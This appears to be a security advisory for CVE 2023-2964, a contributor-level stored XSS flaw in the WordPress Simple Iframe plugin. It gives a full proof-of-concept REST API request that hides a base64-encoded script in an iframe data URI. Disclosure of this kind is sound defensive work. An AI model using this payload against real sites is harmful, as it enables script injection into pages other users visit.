Simple Iframe < 1.2.0 – Contributor+ Stored XSS | CVE 2023-2964

Description

The plugin does not properly validate one of its WordPress block attribute's content, which may allow users whose role is at least that of a contributor to conduct Stored Cross-Site Scripting attacks.

Proof of Concept

POST /wp-json/wp/v2/posts/60?_locale=user HTTP/1.1
Host: 127.0.0.1
Content-Length: 378
sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Content-Type: application/json
Accept: application/json, */*;q=0.1
X-WP-Nonce: 653192f849
X-HTTP-Method-Override: PUT
sec-ch-ua-platform: "Windows"
Origin: http://127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1/wp-admin/post-new.php
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: [Contributor+]
Connection: close

{"id":60,"title":"XSS TEST","content":"<!-- wp:unapersona/simple-iframe {\"iframeSrc\":\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=\"} -->\n<iframe style=\"width:100%;max-width:100%;height:320px\" src=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=\" class=\"\" frameborder=\"0\"></iframe>\n<!-- /wp:unapersona/simple-iframe -->","status":"publish"}